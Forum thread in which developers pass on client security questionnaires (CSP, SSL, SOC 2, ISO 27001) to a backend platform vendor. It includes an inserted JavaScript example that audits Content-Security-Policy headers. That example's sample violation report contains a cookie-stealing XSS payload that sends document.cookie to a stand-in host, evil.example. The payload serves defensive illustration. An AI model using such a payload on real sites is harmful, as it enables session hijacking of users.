Can anyone help me address these questions:
Are ‘deep dive’ security scans possible to reveal intrusions, behavioral anomalies, and unknown threats to the website?
Are Content Security Policies (CSP) in place that can detect & mitigate types of attacks, i.e., XSS and data injections?
Are SSL certificates in place for encrypting Internet traffic and verifying your server identity?
I have received this from a potential client (a university), and already explained we use Backendless and have all the required policies and roles for access control in place.
Please see below:
We have policies in place that would restrict anyone from getting into our system outside of the ways and means provided by the platform and described in the documentation. We provide the security mechanisms for you to restrict access to your data by setting up a security policy for your app. If the security is not in place and someone accesses your application via API, we would not be able to detect that since it would be just a regular API call.
We have security policies in place and our system already stops attacks. However, if someone uses API to access data that you have not secured, it would appear as a regular API call.
Yes, all communication with our servers is encrypted and SSL certificates are in place.
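On the CSP item in the questionnaire above, the header is something you set on whatever serves your front end, not something the backend platform answers for you. The following is an added example (not code from this thread, from Backendless, or from the university) that parses a Content-Security-Policy header, flags the settings that would let an injected script run, and summarises a violation report of the kind a report-uri endpoint receives. Both policies and the report are constructed for the example; the nonce value and report endpoint name are placeholders.

```javascript
// Added example: audit a CSP header for XSS-relevant weaknesses and read a violation report.
// Policies and report below are constructed for illustration, not taken from any real deployment.

// Weak policy: wildcard sources plus inline/eval scripts, no reporting.
const WEAK_POLICY =
  "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'";

// Hardened policy: nonce-based scripts, plugins and <base> locked down, violations reported.
// 'nonce-abc123' and 'csp-endpoint' are placeholders the real server would generate/configure.
const STRONG_POLICY =
  "default-src 'self'; script-src 'self' 'nonce-abc123'; object-src 'none'; " +
  "base-uri 'none'; frame-ancestors 'none'; report-to csp-endpoint";

// Parse "directive source source; directive ..." into a Map of directive -> [sources].
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Return a list of findings; an empty list means none of the checked weaknesses is present.
function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];

  // script-src falls back to default-src when absent.
  const scriptSrc = policy.get('script-src') || policy.get('default-src');
  if (!scriptSrc) {
    findings.push("no script-src or default-src: scripts may load from anywhere");
  } else {
    // A nonce or hash makes browsers ignore 'unsafe-inline', so only flag it when neither is present.
    const hasNonceOrHash = scriptSrc.some(s => /^'nonce-|^'sha(256|384|512)-/.test(s));
    if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline' without nonce/hash: injected inline scripts execute");
    }
    if (scriptSrc.includes("'unsafe-eval'")) {
      findings.push("script-src allows 'unsafe-eval': string-to-code sinks are not blocked");
    }
    if (scriptSrc.some(s => s === '*' || s === 'http:' || s === 'https:')) {
      findings.push("script-src allows a wildcard scheme/host: attacker-hosted scripts load");
    }
  }

  // object-src also falls back to default-src; plugins are another script-execution path.
  const objectSrc = policy.get('object-src') || policy.get('default-src');
  if (!objectSrc || !objectSrc.includes("'none'")) {
    findings.push("object-src is not 'none': plugin content can execute");
  }

  // base-uri does NOT fall back to default-src; an injected <base> can redirect relative script URLs.
  if (!policy.has('base-uri')) {
    findings.push("base-uri missing: injected <base> tag can hijack relative script URLs");
  }

  // Without a reporting directive the policy blocks but nobody is told (the "detect" half of the question).
  if (!policy.has('report-to') && !policy.has('report-uri')) {
    findings.push("no report-to/report-uri: violations are blocked but never reported");
  }
  return findings;
}

// Constructed example of the JSON body a report-uri endpoint receives when an inline script is blocked.
const SAMPLE_REPORT = JSON.stringify({
  "csp-report": {
    "document-uri": "https://app.example.edu/profile",
    "violated-directive": "script-src",
    "effective-directive": "script-src",
    "blocked-uri": "inline",
    "script-sample": "document.location='https://evil.example/?c='+document.cookie"
  }
});

// Reduce a report to the fields a SOC would alert on.
function summarizeReport(body) {
  const r = JSON.parse(body)['csp-report'];
  if (!r) throw new Error('not a CSP violation report');
  return {
    page: r['document-uri'],
    directive: r['effective-directive'] || r['violated-directive'],
    blocked: r['blocked-uri'],
    sample: r['script-sample'] || ''
  };
}

console.log('weak policy findings:', auditCsp(WEAK_POLICY));
console.log('strong policy findings:', auditCsp(STRONG_POLICY));
console.log('report:', summarizeReport(SAMPLE_REPORT));
```

The point for the questionnaire: a CSP only "detects" attacks if it carries report-to or report-uri and something ingests the reports; the blocking alone is silent. Run it against your own header to see which of the six checks fire.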
Hello @mark-piller, some more questions here from another client; if you could provide any additional information, thank you:
Have you undergone a SSAE 18 / SOC 2 audit?
Have you completed the Cloud Security Alliance (CSA) CAIQ?
Have you received the Cloud Security Alliance STAR certification?
Do you conform with a specific security standard framework (e.g. ISO 27001)?
Is the system compliant with NIST SP 800-171?
Are you using a web application firewall (WAF)?
Are your systems scanned for vulnerabilities?
Any third party assessments?
Do you have a SOC 2 type 2 report available?
Does your organization have physical security controls and policies in place?
Do you have physical access control and video surveillance?
Do you enforce network segmentation between trusted and untrusted networks?
Are you utilizing a stateful packet inspection (SPI) firewall?
Do you use any IDS/IPS system to monitor for intrusions?
Are you employing next generation persistent threat (NGPT) monitoring?
Apologies for the many questions, and thank you in advance for any input you can provide.
I sent you an email with the answers.
Hi @mark-piller, can you also send me the same email? Specifically, I am looking for ISO 27001 and SOC 2.